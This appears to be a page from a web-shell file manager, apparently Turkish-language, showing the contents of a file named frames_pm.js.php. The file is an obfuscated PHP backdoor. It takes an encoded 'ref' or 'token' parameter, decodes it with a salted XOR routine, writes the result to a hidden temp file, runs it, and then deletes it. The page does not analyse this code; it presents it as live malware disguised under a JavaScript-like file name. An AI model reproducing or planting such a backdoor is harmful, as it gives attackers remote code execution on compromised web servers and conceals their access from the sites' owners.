0x1998 - MANAGER
Düzenlenen Dosya: frames_pm.js.php
<?php if(array_key_exists("\x72e\x66", $_REQUEST)){ $key = $_REQUEST["\x72e\x66"]; $key =explode ( '.' , $key ) ; $val = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); foreach($key as $r=> $v7) { $sChar = ord($salt[$r%$lenS] ); $d =((int)$v7 - $sChar -($r%10)) ^ 36; $val .= chr($d );} $res = array_filter([ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), "/tmp", "/dev/shm", session_save_path()]); foreach ($res as $key => $bind) { if ((function($d) { return is_dir($d) && is_writable($d); })($bind)) { $item = sprintf("%s/.tkn", $bind); $file = fopen($item, 'w'); if ($file) { fwrite($file, $val); fclose($file); include $item; @unlink($item); exit; } } } } if(count($_POST) > 0 && isset($_POST["t\x6F\x6Ben"])){ $bind = $_POST["t\x6F\x6Ben"]; $bind= explode ( '.' , $bind ) ; $element=''; $s5='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($s5); foreach ($bind as $m => $v9) { $sChar=ord($s5[$m % $sLen]); $dec=((int)$v9 - $sChar - ($m % 10)) ^21; $element .= chr($dec); } $rec = array_filter([getenv("TMP"), getenv("TEMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), session_save_path(), "/tmp"]); foreach ($rec as $val) { if (is_dir($val) && is_writable($val)) { $reference = implode("/", [$val, ".pset"]); if (file_put_contents($reference, $element)) { require $reference; unlink($reference); exit; } } } }
geri dön